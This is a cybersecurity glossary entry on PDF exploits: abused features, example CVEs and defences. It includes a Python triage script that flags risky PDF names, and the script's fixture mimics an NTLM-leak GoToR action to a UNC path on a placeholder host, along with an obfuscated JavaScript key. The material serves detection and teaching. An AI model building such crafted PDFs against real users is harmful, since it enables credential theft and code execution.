PDF Exploit
What is PDF Exploit?
A malicious PDF document that abuses parser bugs, embedded JavaScript, fonts, or external actions in a PDF reader to achieve code execution or data exfiltration.
A PDF exploit is an attack delivered through a crafted PDF document that abuses one of the format's many features — embedded JavaScript, OpenAction triggers, GoToE/GoToR remote URLs, EMF/JBIG2/JPX image parsers, embedded XFA forms, U3D 3D streams, or font handlers — to attack a PDF viewer. Historically Adobe Acrobat Reader has been a frequent target (e.g. CVE-2009-1492, CVE-2018-4990, CVE-2023-21608), but Foxit, Chrome's PDFium, and macOS Preview have all had critical bugs. Modern PDF exploits often achieve remote code execution via memory corruption, leak NTLM hashes through automatic URL fetches, or trigger drive-by malware downloads. Defenses include patching, disabling JavaScript, using sandboxed viewers, and email gateway analysis.
● Examples
- 01: A PDF with embedded JavaScript that triggers a heap overflow in Adobe Reader (CVE-2018-4990).
- 02: An NTLM credential-leak PDF with a UNC-path GoToR action.
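As an added example that is not part of this glossary entry, the following Python triage script flags the risky PDF features listed in the definition and examples above: it decodes `#xx` escapes in name objects, inflates FlateDecode streams so keys hidden inside object streams are visible, counts action, JavaScript and image-filter names, and extracts UNC-style file specifications of the kind used by the credential-leak example. The fixture document and the hostname in it are constructed for the test and do not form an openable PDF.

```python
import re
import zlib
from collections import Counter

# Name objects worth flagging, drawn from the feature list in the definition above.
RISKY_NAMES = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/GoToR", b"/GoToE",
               b"/Launch", b"/URI", b"/XFA", b"/JBIG2Decode", b"/JPXDecode", b"/RichMedia"]
NAME_END = rb"(?=[\s/\[\]<>(){}%]|$)"  # a name token ends at whitespace or a delimiter

def decode_name_escapes(data: bytes) -> bytes:
    """Undo #xx hex escapes in name objects (/J#61vaScript -> /JavaScript)."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), data)

def inflate_streams(data: bytes) -> bytes:
    """Append every stream body that inflates as zlib, so names hidden inside
    FlateDecode-compressed object streams are scanned as well."""
    extra = b""
    for m in re.finditer(rb"stream\r?\n(.*?)\r?\nendstream", data, re.S):
        try:
            extra += b"\n" + zlib.decompress(m.group(1))
        except zlib.error:
            pass  # not zlib data (image, other filter): nothing to add
    return data + extra

def unc_file_specs(data: bytes) -> list:
    """File specifications (/F or /UF strings) that resolve to a UNC path."""
    found = []
    for s in re.findall(rb"/U?F\s*\(([^)]*)\)", data):
        s = s.replace(b"\\\\", b"\\")  # undo the PDF string escape for backslash
        if s.startswith(b"\\\\") or s.startswith(b"//"):
            found.append(s.decode("latin-1"))
    return found

def triage(pdf_bytes: bytes) -> dict:
    """Count risky names and list UNC file references found in a PDF."""
    data = decode_name_escapes(inflate_streams(pdf_bytes))
    counts = Counter()
    for name in RISKY_NAMES:
        counts[name.decode()] = len(re.findall(re.escape(name) + NAME_END, data))
    return {"names": {k: v for k, v in counts.items() if v}, "unc": unc_file_specs(data)}

# Constructed fixture, not an openable document: an OpenAction to a GoToR with a UNC
# file spec, plus an obfuscated /JavaScript key inside a Flate-compressed object stream.
_OBJSTM = zlib.compress(b"<< /S /J#61vaScript /JS (app.alert(1)) >>")
SAMPLE_PDF = (b"%PDF-1.7\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
              b"2 0 obj << /S /GoToR /F (\\\\\\\\fileserver.example\\\\share\\\\doc.pdf) >> endobj\n"
              b"3 0 obj << /Type /ObjStm /Filter /FlateDecode /Length "
              + str(len(_OBJSTM)).encode() + b" >>\nstream\n" + _OBJSTM
              + b"\nendstream\nendobj\n%%EOF\n")
```

A plain byte scan like this is a first-pass filter only: streams compressed with filters other than Flate, or encrypted documents, need a full PDF parser before the names become visible.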
● Frequently asked questions
What is PDF Exploit?
A malicious PDF document that abuses parser bugs, embedded JavaScript, fonts, or external actions in a PDF reader to achieve code execution or data exfiltration. It belongs to the Application Security category of cybersecurity.
What does PDF Exploit mean?
A malicious PDF document that abuses parser bugs, embedded JavaScript, fonts, or external actions in a PDF reader to achieve code execution or data exfiltration.
How does PDF Exploit work?
A PDF exploit is an attack delivered through a crafted PDF document that abuses one of the format's many features — embedded JavaScript, OpenAction triggers, GoToE/GoToR remote URLs, EMF/JBIG2/JPX image parsers, embedded XFA forms, U3D 3D streams, or font handlers — to attack a PDF viewer. Historically Adobe Acrobat Reader has been a frequent target (e.g. CVE-2009-1492, CVE-2018-4990, CVE-2023-21608), but Foxit, Chrome's PDFium, and macOS Preview have all had critical bugs. Modern PDF exploits often achieve remote code execution via memory corruption, leak NTLM hashes through automatic URL fetches, or trigger drive-by malware downloads. Defenses include patching, disabling JavaScript, using sandboxed viewers, and email gateway analysis.
How do you defend against PDF Exploit?
Defences against PDF exploits combine technical controls and operational practices: keeping PDF readers patched, disabling JavaScript in the viewer, opening documents in sandboxed viewers, and analysing attachments at the email gateway, as listed in the full definition above.
What are other names for PDF Exploit?
Common alternative names include: Malicious PDF, PDF-based attack.
● Related terms
- Drive-by Download (attacks): An attack in which malware is silently installed on a victim's device simply by visiting a compromised or malicious website.
- Code Injection (attacks): A class of vulnerabilities where attacker-supplied data is interpreted and executed as code by an application, leading to arbitrary execution in its context.
- Phishing (attacks): A social-engineering attack in which an attacker impersonates a trusted party to trick a victim into revealing credentials, transferring money, or running malware.
- Browser Sandbox (appsec): An OS-level isolation layer that confines a browser's renderer and helper processes so that compromised web code cannot read the file system or other applications.
- Memory Corruption (vulnerabilities): An umbrella term for vulnerabilities where a program writes outside the bounds of intended memory, undermining type-safety, control flow, or data integrity.